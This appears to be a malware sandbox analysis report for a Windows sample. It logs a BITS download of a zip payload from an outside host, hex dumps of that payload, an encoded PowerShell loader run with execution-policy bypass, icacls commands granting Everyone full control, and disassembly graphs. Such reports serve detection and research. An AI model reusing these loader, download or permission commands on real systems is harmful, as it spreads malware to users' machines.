                                                      2024-12-20 14:28:25 UTC233OUTGET /notafiscal/download/cat.zip HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Accept: */*
                                                      Accept-Encoding: identity
                                                      If-Unmodified-Since: Wed, 18 Dec 2024 07:18:28 GMT
                                                      User-Agent: Microsoft BITS/7.8
                                                      Host: site.webmailcontabilidadecrx.net
                                                      2024-12-20 14:28:26 UTC267INHTTP/1.1 200 OK
                                                      Date: Fri, 20 Dec 2024 14:28:25 GMT
                                                      Server: Apache
                                                      Upgrade: h2
                                                      Connection: Upgrade, close
                                                      Last-Modified: Wed, 18 Dec 2024 07:18:28 GMT
                                                      ETag: "83c3db-6298638673d7e"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 8635355
                                                      Content-Type: application/zip
                                                      2024-12-20 14:28:26 UTC7925INData Raw: 50 4b 03 04 14 00 00 00 08 00 3b 21 92 59 2a fe 82 59 45 c3 83 00 a0 87 86 00 08 00 00 00 70 6c 61 79 2e 65 78 65 ec bd 65 54 1c c1 df ef d9 b8 33 10 20 b8 bb bb 06 42 70 08 04 87 00 41 83 0d ee ee c1 19 3c b8 05 82 bb 7b b0 24 68 80 e0 16 3c 24 0c 04 77 4b 58 66 f8 df 73 9f 7d ce de bd 6f f6 d5 9e 3b e7 40 7f e7 f3 93 e9 ae 9e ae ae ea aa ee 79 65 90 08 20 01 00 80 fc f0 77 7f 0f 00 6d c0 e3 eb 05 f0 bf 7f 05 3f fc e1 52 77 e0 02 4d 18 63 b4 6d 08 2a 63 b4 da 60 1b 37 1a 67 57 27 6b 57 33 07 1a 73 33 47 47 27 77 9a b7 96 34 ae 1e 8e 34 36 8e 34 b2 6a 5a 34 0e 4e 16 96 5c 38 38 98 0c ff c9 a1 2e 07 00 2a 08 e8 00 6f ff 91 e5 ff c8 bb 0e 20 22 60 21 e0 32 01 b8 0f 6f 14 11 e0 cc 21 fd 27 00 e0 3d 08 1a e0 71 ed 60 1a 11 00 50 e1 d6 ff b9 04 12 f7 e1 1b 83
                                                      Data Ascii: PK;!Y*YEplay.exeeT3 BpA<{$h<$wKXfs}o;@ye wm?RwMcm*c`7gW'kW3s3GG'w4464jZ4N\88.*o "`!2o!'=q`P
                                                      2024-12-20 14:28:26 UTC8000INData Raw: a9 4d 1d 38 9d fd 5a fa 24 cd 33 3b 40 6d 79 dc 4a 00 c7 f7 21 b9 b1 bf 03 d8 e5 a3 a4 44 e6 8b c3 9c 39 2c 07 ec cf 5e ea ed 4f f5 09 e6 ea 66 c1 4d af d1 ea c1 92 81 ac 74 56 0f 6d ae 00 04 2c 00 76 1d 1e 80 e4 b5 21 c3 8e 2e 54 29 a9 8b 45 30 1f 57 f6 47 d8 49 1f 47 2a b8 af 1a 1a c3 f7 d0 c2 38 80 7d 7d 21 a8 e0 0a 9e 9c dd 5e 0b 06 c0 9a ff 4b 88 3d 03 d0 d9 d3 30 05 4a f0 78 13 04 ef ef 42 5b 0d 82 81 85 8f a7 e9 9e 2c 44 4a eb 39 83 ad b6 62 44 5a 33 1d b7 c8 4c 0d 75 83 43 9f ea 56 d4 3b 63 64 e2 25 56 9b 1b bf 57 5c 30 f1 ae 29 e2 06 5e 1c a0 3c 6b f5 20 a6 c3 91 a1 cf 75 28 b5 21 13 64 99 91 a1 1d b8 4a d1 35 49 dc 4c 71 28 31 51 07 36 00 74 f0 b3 d1 2b be 8a 91 bb 67 40 e0 6a 84 41 7d 82 af ac 5e ee 9b 93 6f 6d 68 b7 d3 cb d9 86 f5 4f bf a8 34
                                                      Data Ascii: M8Z$3;@myJ!D9,^OfMtVm,v!.T)E0WGIG*8}}!^K=0JxB[,DJ9bDZ3LuCV;cd%VW\0)^<k u(!dJ5ILq(1Q6t+g@jA}^omhO4
                                                      2024-12-20 14:28:26 UTC8000INData Raw: 8f 0f 22 e3 17 16 ac 4f 3a 24 d8 df 2e e2 c0 3a a6 5d 4e 74 4b 7b 56 9d 2a cb 66 a3 2b 7d ab 86 ca c7 8b ec c7 f9 13 0d d6 89 f3 fd 5f 51 1a df 68 0a 36 71 40 2d ba 9a 03 b5 3b 3e 43 f4 1b d4 28 6d 9a 45 4a 45 3e 15 f0 a2 77 ce 25 e7 ae 29 22 57 2f 48 76 df 4d 96 b0 8c ce 4d b6 4f da 48 71 6f 38 0a a5 d6 59 d7 22 05 9b 2e e4 13 21 cb 0b 31 22 f1 c6 ba 63 96 91 c9 e2 ac 89 23 ee 80 b9 bc 01 cc 49 d8 d9 af 96 32 b2 65 87 c6 cc 0f 08 19 84 cf ea 29 4b 48 6e b9 d8 01 33 ee b3 5f 59 45 a3 41 d1 4c b1 00 8b 68 74 f8 c9 98 b4 0b 19 80 5f 4a fd bc 8b 0d 9f d9 93 6f 22 52 65 85 34 6b 15 fd 74 c7 46 c6 1f 80 cf e1 da 11 8e 0e 80 1b 85 f8 f1 47 60 57 5b 27 42 e6 60 d7 84 77 be 87 bb 00 e0 1e 86 46 47 a8 42 b5 37 00 cd 64 0c 04 1e e7 4a 0a 3d 74 72 c8 16 b3 6a 77 76
                                                      Data Ascii: "O:$.:]NtK{V*f+}_Qh6q@-;>C(mEJE>w%)"W/HvMMOHqo8Y".!1"c#I2e)KHn3_YEALht_Jo"Re4ktFG`W['B`wFGB7dJ=trjwv
                                                      2024-12-20 14:28:26 UTC8000INData Raw: a2 be ad 20 ab c3 13 b4 e6 c4 15 2f f1 21 36 ea 5e 6f e5 ac 27 b7 99 f2 94 8a 06 9a 0e 0b 3c a7 56 c9 01 72 ea dc 53 6c 30 96 f0 f4 53 4c 6b 98 53 70 e2 dc bb 4c 57 2a 2c c3 aa e8 d2 4e 6e ff 24 cb a4 86 fa 2f 97 ec 30 0f 57 26 4c 59 63 c8 a6 32 e6 3f 28 eb 6c 07 52 3c 8c e1 85 b0 ee 10 93 15 a9 eb 46 ea 23 33 25 c0 48 9e 71 fa a8 85 6d 63 98 30 c9 8f 80 68 6a e3 90 57 8f 8e 8a b3 ab 91 1d 02 b9 e8 77 22 ec cf 6d 1f 3d cf 59 af a3 bd e2 cb bb bc 3d 04 7a f5 89 09 b1 1e 1d 17 e5 33 a8 5b 2d 63 0a 57 73 26 7d ec bf e1 1b e2 3b fa 0d ef 15 64 08 7f c1 20 84 be 79 0c 5c 04 51 27 b9 fb 59 15 93 1f ce 88 fc 8e e0 f9 06 63 b3 b2 44 e2 08 65 b8 37 c7 9c 27 85 44 23 30 32 88 c2 e3 78 30 d4 19 9d f3 6d 40 ab f4 8d b3 25 c6 a3 a3 e6 f7 2c d6 f1 90 b8 36 e8 e9 c0 fc
                                                      Data Ascii: /!6^o'<VrSl0SLkSpLW*,Nn$/0W&LYc2?(lR<F#3%Hqmc0hjWw"m=Y=z3[-cWs&};d y\Q'YcDe7'D#02x0m@%,6
                                                      2024-12-20 14:28:26 UTC8000INData Raw: 89 4f 13 99 db 4b fc 9a 22 3c 0f f3 f0 92 93 d6 fd a0 f1 85 80 34 66 4f 9d f0 08 b9 84 01 ca 4a c2 2f fd 50 25 b0 5d 34 8f 45 4f a3 a7 e1 6b 62 23 6b 4a 47 46 10 f1 73 b1 a7 89 6e cd c4 22 e6 74 09 be b1 21 43 1f ac 35 a8 83 7a e3 de b3 2c 1a 25 9c fc 7d 9f e6 46 d7 b6 39 56 8b a0 ca b3 26 fb e1 79 f1 dc 41 68 e1 69 10 67 ee 59 7a 5b 5e aa e6 fc e2 4f c3 cc 9f 9b 11 42 6b a2 39 a2 e3 f1 14 1a e6 1c 4d 74 4f 25 b5 dc 43 e4 46 9f 98 0d 0d d7 48 ea fc c5 5b 1a bf 22 c8 76 a0 ae 78 21 d8 51 d1 11 55 53 d4 6c 5f 40 73 e1 8d fc 43 24 06 b1 dd ae af 97 f6 3b a2 92 2d 6d 30 39 d1 6f c1 f0 53 8a b8 40 dd 90 7e 19 66 7d ea 97 cd 37 61 36 ed ae 2d 14 df be 18 66 a7 5d 88 e9 7c 2b 88 e2 31 50 68 d8 62 c1 a4 ac c3 78 13 de ab 29 c3 27 44 27 d6 27 63 9d 3c 8a 54 1b e4
                                                      Data Ascii: OK"<4fOJ/P%]4EOkb#kJGFsn"t!C5z,%}F9V&yAhigYz[^OBk9MtO%CFH["vx!QUSl_@sC$;-m09oS@~f}7a6-f]|+1Phbx)'D''c<T
                                                      2024-12-20 14:28:26 UTC8000INData Raw: eb 1a 75 9d 53 9a d6 2b 9d 1c d4 bf b7 8a ab 43 43 1f b1 0b cb 61 e9 c5 be 7a 18 1d c9 cd 3f 07 b0 b1 9e 8e 98 62 93 6f fd 0c 1e fc 98 e1 f2 75 f7 4a 25 e2 f9 ee 2e 95 82 01 2c b4 4b 9c 57 74 19 f2 1b 59 a3 a1 3a 7d 2c 76 f0 9f 96 f4 da 8f b0 cc dd 35 69 fe 2a 31 0c 75 37 7e 9b 5f 94 27 7b 31 7a 30 44 83 18 d9 9d aa 33 aa ec ca c2 27 b5 c2 22 7f 55 87 f7 c2 de ba 18 7d e6 95 f4 60 12 ac fc f6 99 75 52 1d 42 72 f8 2d fe 83 d5 a3 e7 93 33 cc 84 a8 fb cc 2f 32 57 28 5f be 5e 12 a6 38 6a 74 37 ac 1e 87 4f 0f f1 69 9c bd b3 4c 5a 1b c0 d6 38 fe 19 6c 4c 41 29 b2 5a d9 50 6e 4d f1 c8 b3 b4 b1 62 0c ef b9 ff 8b e7 93 d9 06 af 5f 6e f3 61 2c 5f a0 f0 30 25 48 5a f8 6f d2 6b 24 7c cf 6c 5d b0 53 f9 85 76 38 b9 7a 3d 92 4b 51 f1 7a bf 40 37 48 0e 13 cb a2 39 31 38
                                                      Data Ascii: uS+CCaz?bouJ%.,KWtY:},v5i*1u7~_'{1z0D3'"U}`uRBr-3/2W(_^8jt7OiLZ8lLA)ZPnMb_na,_0%HZok$|l]Sv8z=KQz@7H918
                                                      2024-12-20 14:28:26 UTC8000INData Raw: df ca 3e 3a 2c be 88 3e db 78 56 c1 4f ec a9 f3 bd 31 cd bc 20 2c 7d ec 8b 75 11 d9 b4 e0 f6 c8 d9 0b 8d ec c9 e7 b6 8f b7 39 71 fc 90 0f 49 3c 49 0c 3e 1b 38 09 12 b1 f4 a6 e2 80 31 47 bd aa ec f7 a2 91 18 e5 2d ce 52 86 df b6 31 53 72 91 a2 6b 2a 9b b0 ac 7a 83 95 9d e2 7a 6e 20 4f 2b 93 01 88 4e 87 97 ad 8e c3 07 8e aa 82 7a d6 14 dc d4 f0 78 d7 2e ca 0b 41 03 cb 23 0f 84 7b 81 f5 31 42 3a f1 bc 3e 29 af 40 fc 0c fc 14 c7 dd 46 12 fe 6d ac c3 bc 15 45 f1 72 61 f6 ed 0b f9 d1 e2 c0 78 09 5a c2 7e 63 3c 33 db 5e 92 27 ba f3 3e a2 2a e8 05 d9 50 c8 c7 ab 6a 3f 96 ce 0f fa c7 d5 71 b4 88 e4 f7 2b 3c a9 22 fb 6b 96 25 a5 bc 15 a2 85 74 1f 3f 9b 0d 7d 68 f8 dc e9 df d7 4b 2e 76 ab c8 02 a1 d3 d9 dd 8a 37 49 26 07 7e 14 37 89 8e 7d f9 9c 43 66 01 17 b6 3b f4
                                                      Data Ascii: >:,>xVO1 ,}u9qI<I>81G-R1Srk*zzn O+Nzx.A#{1B:>)@FmEraxZ~c<3^'>*Pj?q+<"k%t?}hK.v7I&~7}Cf;
                                                      2024-12-20 14:28:26 UTC8000INData Raw: 04 d2 70 92 61 da 7e f3 25 8c 8f c6 b4 47 86 1e 05 ad e7 fe 29 3c 14 12 88 de 6c 73 ef 07 ab 64 73 05 4c 7d 2c e8 51 05 66 61 3f b2 bd 80 43 41 e6 2f 55 21 31 9c 1c 15 18 26 19 11 ab 45 fe 41 66 d2 d6 e6 e8 dc a4 22 06 6e 6f 74 59 d1 8f c6 76 1c 65 d3 6d 25 6d f5 5e b8 ca eb 4b 1c 2c 13 3f a5 2a 0b b7 7d 7d 08 0a 0b 37 45 fc b1 95 83 f6 fb ac b5 9f 9b fe 16 8c c1 a2 78 be 16 c5 5c e5 83 c2 49 0f cc b0 9d bf 91 ef af 70 13 e3 50 1a d1 e0 33 ae 12 77 5b de a0 1a 51 4a 33 68 7b fe 7b ff a3 f6 85 1a 17 35 61 17 40 b1 3a 59 f9 e2 84 89 8b 76 2c d3 33 ae 52 ce ff 3b de 5b bc b7 be f7 79 12 ec 2d 96 12 75 b9 bd 1e 2d d1 02 6c 34 12 ec 63 83 41 55 41 45 4d 5f 2a b6 39 04 c1 18 3d a1 6e 7e 01 50 c8 e0 8a 1b 0b fe ea 3f 8f 1f 7f 7d 69 5e 9f 50 e8 dc 14 65 29 b3 8b
                                                      Data Ascii: pa~%G)<lsdsL},Qfa?CA/U!1&EAf"notYvem%m^K,?*}}7Ex\IpP3w[QJ3h{{5a@:Yv,3R;[y-u-l4cAUAEM_*9=n~P?}i^Pe)
                                                      2024-12-20 14:28:26 UTC8000INData Raw: c4 fc 5b 13 e3 6b e6 b6 4b 89 29 5c b7 91 8f 87 b7 63 e3 95 46 ec 14 b2 6f 4a 03 24 ea e8 5e 09 1f 0c 8e 3b d6 e2 e0 1a 88 6b aa 79 32 e0 67 6d 91 ad 8a ce 5e 51 a7 2b e1 22 a1 63 77 68 d8 67 a2 b2 2b a7 8f 7b 07 fd 4d 59 77 95 3b 5d fe 54 91 21 a3 7d 53 34 f2 db d2 04 4b e4 72 cd f0 87 36 a1 20 81 c5 f7 eb c1 6f dc 9f 0e 49 66 24 c2 0e 97 17 d2 22 c9 a9 b8 cd 84 da e9 94 74 16 31 35 42 66 68 9e 37 e8 94 f4 ee 8b 4f ef 43 7b 62 fe bc 16 b5 c8 62 c5 0e 81 84 b2 ce 39 00 b1 4a ba 4c 3c 15 db 4e 5b a7 d6 0d db d1 97 6e ee 1b 28 4f 32 09 34 88 32 06 4c d4 51 e3 6e 9d c7 b3 0e d2 99 71 ba 63 c9 fe 3c e5 d2 80 d6 25 ac 27 d8 ba 52 f1 c0 7e 17 97 b9 8e c4 a7 a0 56 97 60 74 c2 e2 87 5f 3e fa 22 44 57 64 8a e2 4a d2 95 fc 1b 6a 48 f4 6b 5e e9 6a e7 86 ca 46 96 33
                                                      Data Ascii: [kK)\cFoJ$^;ky2gm^Q+"cwhg+{MYw;]T!}S4Kr6 oIf$"t15Bfh7OC{bb9JL<N[n(O242LQnqc<%'R~V`t_>"DWdJjHk^jF3
                                                      2024-12-20 14:28:26 UTC8000INData Raw: 17 f5 71 1d ce 08 90 f2 39 5d f1 5d fe b5 36 b3 62 10 34 e5 42 6d aa 19 ab 81 04 e9 1a f7 e9 85 55 7a aa da af 11 bb 2c b7 8a c4 85 21 db b4 cc 38 e4 e7 52 d5 a3 85 7c e1 b7 6a a9 ba 7b e5 b2 ac bb e7 4d 94 b0 6e 23 61 6e 23 9a 2e c3 6d 45 62 ab 1b 33 1b fb 5b b3 18 d3 dd 64 df a5 5e 67 3e 13 9a ef 22 56 ab 20 e5 55 6b 1d a4 a0 f9 3b a9 fb 1f 56 d0 0a 48 28 2c 38 65 42 57 4a d9 9a 56 d8 a2 ce 1a 4b a0 b7 6a 8c cb f8 9f 9f 5a 0d 38 b0 fa b8 31 b6 1c 8f d8 dd d1 7b 20 70 ab 9f 1f 3c 58 8d 0c 4c 93 7e 3f 91 cf dd b1 82 7a 9b 44 ad 71 72 81 4b 07 fa ec d5 f3 0e e8 ef 72 c3 83 a5 1e 9e a3 b4 fd 22 45 82 6e d4 85 ee 04 f6 97 11 7f 1a 5f 2e 58 ab 09 e0 93 a1 07 a9 a7 d5 c5 8c eb cc 37 44 ca 63 3a 3a 90 88 a6 9e 84 58 9a 28 12 e6 26 3e 79 4c 4e a7 c7 12 cf c2 09
                                                      Data Ascii: q9]]6b4BmUz,!8R|j{Mn#an#.mEb3[d^g>"V Uk;VH(,8eBWJVKjZ81{ p<XL~?zDqrKr"En_.X7Dc::X(&>yLN


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:09:28:10
                                                      Start date:20/12/2024
                                                      Path:C:\Users\user\Desktop\PVKDyWHOaX.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\PVKDyWHOaX.exe"
                                                      Imagebase:0xea0000
                                                      File size:133'536 bytes
                                                      MD5 hash:79AB86017B2C9B713D6AF08086B1937F
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:2
                                                      Start time:09:28:10
                                                      Start date:20/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAyAGMAYgBiADYANQA0AGUALQA1AGMANgA0AC0ANAAzADkANwAtADkAMwA5ADUALQAzAGYANgA0ADEANQA2ADgAMwAwAGYAYQAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEQAZQBzAGsAdABvAHAAXABQAFYASwBEAHkAVwBIAE8AYQBYAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A
                                                      Imagebase:0x7ff7be880000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:3
                                                      Start time:09:28:10
                                                      Start date:20/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:4
                                                      Start time:09:28:13
                                                      Start date:20/12/2024
                                                      Path:C:\Windows\System32\icacls.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\system32\icacls.exe" C:\Nvidia-75619 /grant Everyone:F /T /C
                                                      Imagebase:0x7ff7b3920000
                                                      File size:39'424 bytes
                                                      MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:09:28:14
                                                      Start date:20/12/2024
                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                      Imagebase:0x7ff6ef0c0000
                                                      File size:496'640 bytes
                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:09:28:16
                                                      Start date:20/12/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:09:28:41
                                                      Start date:20/12/2024
                                                      Path:C:\Windows\System32\icacls.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\system32\icacls.exe" C:\Nvidia-75619\Nvidia-75619.exe /grant Everyone:F /T /C
                                                      Imagebase:0x7ff7b3920000
                                                      File size:39'424 bytes
                                                      MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:09:28:42
                                                      Start date:20/12/2024
                                                      Path:C:\Nvidia-75619\Nvidia-75619.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Nvidia-75619\Nvidia-75619.exe"
                                                      Imagebase:0x190000
                                                      File size:8'816'544 bytes
                                                      MD5 hash:D11828146FF9E2E340C555F9531CAC47
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:Borland Delphi
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:11
                                                      Start time:09:28:54
                                                      Start date:20/12/2024
                                                      Path:C:\Nvidia-75619\Nvidia-75619.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Nvidia-75619\Nvidia-75619.exe"
                                                      Imagebase:0x190000
                                                      File size:8'816'544 bytes
                                                      MD5 hash:D11828146FF9E2E340C555F9531CAC47
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:Borland Delphi
                                                      Reputation:low
                                                      Has exited:true

                                                      Reset < >
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4594342282.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848f30000_PVKDyWHOaX.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4f8861c57d85f0736f7a31a03c383ff57994522d124a08a49a278621ab01a782
                                                        • Instruction ID: 45c463921959b0c557eb4f99d70bd9b2a69dfeb3e40a2f07fe4a9296a9282f82
                                                        • Opcode Fuzzy Hash: 4f8861c57d85f0736f7a31a03c383ff57994522d124a08a49a278621ab01a782
                                                        • Instruction Fuzzy Hash: 9FA1B331A1D91A9FEB98FB28C4956B973E1FF98344F50417AD84EC32D6DE28EC428744
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4594342282.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848f30000_PVKDyWHOaX.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5515feade734c19a37cf52ab9501a97835e455621331f9e09602c5c0e5f46e47
                                                        • Instruction ID: 6546df554e680e0932b4850b7bf4762341c58df7ad9e6adfb6e74021526194b0
                                                        • Opcode Fuzzy Hash: 5515feade734c19a37cf52ab9501a97835e455621331f9e09602c5c0e5f46e47
                                                        • Instruction Fuzzy Hash: FC51A43090D7C89FD746EB389859AE93FE0EF87351F0841ABE489CB1A3CB695845C752

                                                        Execution Graph

                                                        Execution Coverage:3.3%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:15.4%
                                                        Total number of Nodes:39
                                                        Total number of Limit Nodes:2
                                                        execution_graph 13932 7ff848f280a9 13933 7ff848f280af CoCreateInstance 13932->13933 13935 7ff848f2814b 13933->13935 13936 7ff848f2c168 13937 7ff848f2c171 13936->13937 13939 7ff848f2c399 13937->13939 13940 7ff848f24e50 13937->13940 13940->13937 13941 7ff848f2ce10 13940->13941 13944 7ff848f27e10 13941->13944 13943 7ff848f2ce68 13943->13937 13945 7ff848f27e6b 13944->13945 13947 7ff848f27e22 13944->13947 13945->13943 13946 7ff848f27e2b 13946->13943 13947->13946 13948 7ff848f280e4 CoCreateInstance 13947->13948 13949 7ff848f2814b 13948->13949 13949->13943 13928 7ff848f2b509 13929 7ff848f2b50f IUnknown_QueryInterface_Proxy 13928->13929 13931 7ff848f2b5c8 13929->13931 13920 7ff848f282fc 13921 7ff848f28305 CoSetProxyBlanket 13920->13921 13923 7ff848f283de 13921->13923 13924 7ff848f2aefd 13925 7ff848f2af03 ObjectStublessClient4 13924->13925 13927 7ff848f2afb8 13925->13927 13950 7ff848f26b32 13951 7ff848f26b3a 13950->13951 13952 7ff848f275fc 13951->13952 13954 7ff848f27443 13951->13954 13958 7ff848f26c02 13951->13958 13953 7ff848f24d98 CoCreateInstance 13952->13953 13953->13958 13954->13958 13959 7ff848f24d98 13954->13959 13956 7ff848f275c2 13957 7ff848f24d98 CoCreateInstance 13956->13957 13956->13958 13957->13958 13959->13956 13960 7ff848f2bec0 13959->13960 13961 7ff848f27e10 CoCreateInstance 13960->13961 13962 7ff848f2beff 13961->13962 13963 7ff848f28bb4 13964 7ff848f28bbd ObjectStublessClient3 13963->13964 13966 7ff848f28c7a 13964->13966

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 7ff848f26ac3-7ff848f26ae6 call 7ff848f24c68 4 7ff848f26ae8-7ff848f26af8 call 7ff848f23db0 0->4 5 7ff848f26afb-7ff848f26b04 0->5 4->5 7 7ff848f26b0a-7ff848f26b2e 5->7 8 7ff848f26b8f-7ff848f26ba4 call 7ff848f24c98 5->8 7->8 12 7ff848f26ba9-7ff848f26bb9 8->12 13 7ff848f26bd8-7ff848f26c00 call 7ff848f23e00 12->13 14 7ff848f26bbb-7ff848f26bd3 call 7ff848f23db8 call 7ff848f24dc0 12->14 20 7ff848f26c02-7ff848f26c62 call 7ff848f24ed8 13->20 21 7ff848f26c67-7ff848f26c73 13->21 14->13 50 7ff848f277c9-7ff848f277cc call 7ff848f278df 20->50 22 7ff848f26c79-7ff848f26c9e 21->22 23 7ff848f26d01-7ff848f26d28 call 7ff848f24da0 21->23 22->23 29 7ff848f26d2a-7ff848f26d34 23->29 30 7ff848f26d36 23->30 32 7ff848f26d3b-7ff848f26d3d 29->32 30->32 33 7ff848f26d3f-7ff848f26d51 call 7ff848f24db0 32->33 34 7ff848f26d56-7ff848f26d61 32->34 33->34 37 7ff848f26d79-7ff848f26d84 34->37 38 7ff848f26d63-7ff848f26d74 call 7ff848f24dd0 34->38 41 7ff848f26d9c-7ff848f26da7 37->41 42 7ff848f26d86-7ff848f26d97 call 7ff848f24de0 37->42 38->37 44 7ff848f26da9-7ff848f26dba call 7ff848f24df0 41->44 45 7ff848f26dbf-7ff848f26dca 41->45 42->41 44->45 47 7ff848f26dcc-7ff848f26ddd call 7ff848f24d10 45->47 48 7ff848f26de2-7ff848f26ded 45->48 47->48 52 7ff848f26def-7ff848f26e00 call 7ff848f24d30 48->52 53 7ff848f26e05-7ff848f26e10 48->53 61 7ff848f277d0-7ff848f277e2 50->61 52->53 55 7ff848f26e28-7ff848f26e33 53->55 56 7ff848f26e12-7ff848f26e23 call 7ff848f24d40 53->56 59 7ff848f26e4b-7ff848f26e57 55->59 60 7ff848f26e35-7ff848f26e39 55->60 56->55 62 7ff848f2719d-7ff848f271a9 59->62 63 7ff848f26e5d-7ff848f26e9b 59->63 64 7ff848f26e3b-7ff848f26e46 call 7ff848f24ef0 60->64 66 7ff848f271ab-7ff848f271b7 62->66 67 7ff848f27200-7ff848f2720c 62->67 63->64 86 7ff848f26e9d-7ff848f26eb3 63->86 64->59 66->67 68 7ff848f271b9-7ff848f271fb call 7ff848f23dd0 call 7ff848f23dc8 call 7ff848f24ef8 66->68 70 7ff848f2720e-7ff848f2721a 67->70 71 7ff848f27263-7ff848f2726e 67->71 68->67 70->71 75 7ff848f2721c-7ff848f2725e call 7ff848f23dd0 call 7ff848f23dc8 call 